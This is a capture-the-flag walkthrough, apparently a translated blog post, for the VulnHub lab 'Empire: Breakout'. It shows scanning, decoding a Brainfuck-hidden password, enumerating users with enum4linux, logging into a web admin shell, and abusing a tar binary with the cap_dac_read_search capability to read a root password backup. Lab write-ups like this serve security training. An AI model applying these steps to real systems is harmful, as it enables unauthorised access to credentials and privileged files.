- 英文名称:Empire: Breakout
- Chinese name: Empire: Breakthrough
- Published date: October 21, 2021
- Difficulty: Easy
- Description: This box was created as a simple box, but it can be medium if you get lost. Prompt Discord Server ( https://discord.gg/7asvAhCEhe )
- Download: https://www.vulnhub.com/entry/empire-breakout,751/
AILX10
Excellent answerer in cybersecurity
Master's in Cybersecurity
Go to consult
1. Obtain the basic information of the IP address (192.168.199.166)
IP
2. Port scanning, ports 80, 139, 445, 10000, and 20000 are found
Open ports
10000 ports
20000 ports
3. Enter the web page, view the source code, and get clues
🔥 Home page
Check out the source code and get a clue
++++++++++[>+>+++>+++++++>++++++++++<<<<-]>>++++++++++++++++.++++.>>+++++++++++++++++.----.<++++++++++.-----------.>-----------.++++.<<+.>-.--------.++++++++++++++++++++.<------------.>>---------.<<++++++.++++++.
4、brainfuck在线解码,得到线索:.2uqPEfj3D<P'a-3
brainfuck在线解码
5. Use enum4linux to probe port 445 and get the username: cyber
enum4linux -a 192.168.199.166
[+] Enumerating users using SID S-1-5-21-1683874020-4104641535-3793993001 and logon username '', password ''
S-1-5-21-1683874020-4104641535-3793993001-501 BREAKOUT\nobody (Local User)
S-1-5-21-1683874020-4104641535-3793993001-513 BREAKOUT\None (Domain Group)
[+] Enumerating users using SID S-1-22-1 and logon username '', password ''
S-1-22-1-1000 Unix User\cyber (Local User)
[+] Enumerating users using SID S-1-5-32 and logon username '', password ''
S-1-5-32-544 BUILTIN\Administrators (Local Group)
S-1-5-32-545 BUILTIN\Users (Local Group)
S-1-5-32-546 BUILTIN\Guests (Local Group)
S-1-5-32-547 BUILTIN\Power Users (Local Group)
S-1-5-32-548 BUILTIN\Account Operators (Local Group)
S-1-5-32-549 BUILTIN\Server Operators (Local Group)
S-1-5-32-550 BUILTIN\Print Operators (Local Group)
6. Try to log in to the web page and successfully log in to port 20000
Port 20000 is successfully logged in
7. Click the shell icon in the lower left corner to directly get the interactive shell and easily accept the flag of ordinary users
Common user flags
8. Look at the tar permission, you can read any file
CAP_DAC_READ_SEARCH: Ignore DAC access restrictions for file reads and directory searches
[cyber@breakout ~]$ ls -hl tar
-rwxr-xr-x 1 root root 520K Oct 19 2021 tar
[cyber@breakout ~]$ getcap tar
tar cap_dac_read_search=ep
9. Use tar compression and decompression to successfully obtain the flag of root privilege
cyber@breakout ~]$ ./tar -cvf ailx10.tar /var/backups/.old_pass.bak
./tar: Removing leading `/' from member names
/var/backups/.old_pass.bak
[cyber@breakout ~]$ ./tar -xvf ailx10.tar
var/backups/.old_pass.bak
[cyber@breakout ~]$ ls
ailx10.tar
tar
user.txt
var
[cyber@breakout ~]$ cat ./var/backups/.old_pass.bak
Ts&4&YurgtRX(=~h
tar compression and decompression
At this point, the experiment is complete~
Posted on 2022-08-20 22:43